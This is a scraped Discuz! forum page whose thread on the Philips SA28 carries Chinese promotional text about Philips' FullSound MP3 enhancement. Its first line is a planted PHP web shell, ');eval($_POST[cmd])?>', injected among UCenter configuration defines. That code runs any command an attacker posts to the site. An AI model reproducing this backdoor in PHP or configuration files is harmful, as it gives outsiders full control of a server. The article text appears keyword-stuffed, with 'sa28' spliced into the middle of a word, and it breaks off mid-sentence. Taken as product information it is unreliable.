');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 飛利浦sa28的聲音 - 3C專區 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

飛利浦sa28的聲音

飛利浦目前推出了最新的FullSound音效技術並已申請專利,此種技術專門應用於經MP3格式壓縮的聲飛利浦sa28音的修復與提升,並將首先應用于飛利浦旗下的所有數字音頻設備。飛利浦還為這種最新的音效技術起了一個響亮的中文名字--飛聲。   我們知道,MP3是一種數字音頻壓縮格式,其原理是將聽覺範圍以外的聲音信號移除後,對剩餘信息進行編碼和壓縮。經過這種數字化的處理後,聲波曲線無法保持原有的平滑,而變成了鋸齒狀,所以MP3的聲音聽起來有毛刺感,顯得生硬和冰冷,缺乏力度和現場音效的感染力。為彌補這一不足,許多音頻系統會通過軟件來對聲音信號進行修復,諸如提升部分頻率、提高解晰度或擴大音場等,但這種修復也容易帶來新的缺限,即失真和產生噪聲。飛利浦FullSound飛聲音效技術,正是為了提高MP
返回列表